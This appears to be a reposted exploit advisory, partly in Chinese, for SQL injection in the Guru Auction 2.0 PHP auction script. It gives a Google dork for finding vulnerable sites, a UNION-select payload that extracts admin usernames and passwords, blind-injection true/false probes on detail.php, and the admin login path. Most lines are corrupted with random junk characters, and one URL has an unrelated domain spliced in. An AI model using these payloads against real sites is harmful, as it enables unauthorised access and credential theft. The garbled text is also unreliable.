Guru Auction 2.0 Multiple SQL Injection Vulnerabilities$ g' X( i# l$ z' b5 W" ^3 Z
1 l5 ~) ~2 {& Q5 Q
作者 : v3n0m
/ X3 z6 f4 s" Y; {+ d! {1 G: i z应用 : Guru Auction 2.00 R5 h+ w) Y9 h; ?+ C' m
Price : $49
`7 {& i) A% ZVendor : http://www.guruscript.com/2 t, w- w. B. Q) e+ o
Google Dork : inurl:subcat.php?cate_id=2 V7 X% O" e3 g
. A; w( Q0 n, W5 ?* w$ L7 `SQLi p0c:' s2 {3 g2 P4 Q- `4 B4 m4 ?8 h' x1 y
~~~~~~~~~~4 g3 C7 m1 `4 V. n
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--1 y& J+ n- c0 |, x' `, I. f
' o$ y: u& e5 ]* |9 {
$ e! E0 D4 B# y3 U# K盲注 p0c:
) A5 [+ s5 Q0 V" v* ?$ r: b~~~~~~~~~~
- o3 ?: V+ ~1 Q) g# E3 _' Khttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true1 r/ G5 M9 [; H' B! ?
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false$ D1 S0 m* p+ U% X7 U0 Y1 y
" T8 [+ x$ E$ V. z! Y
管理登录入口:6 l$ x/ H3 A0 t( o. W$ O3 |9 k! g
~~~~~~~~~~
7 h! g8 c& G4 r. D& s+ t0 ehttp://domain.tld/[path]/admin/: H4 Q; X6 e3 w* N0 k) [
|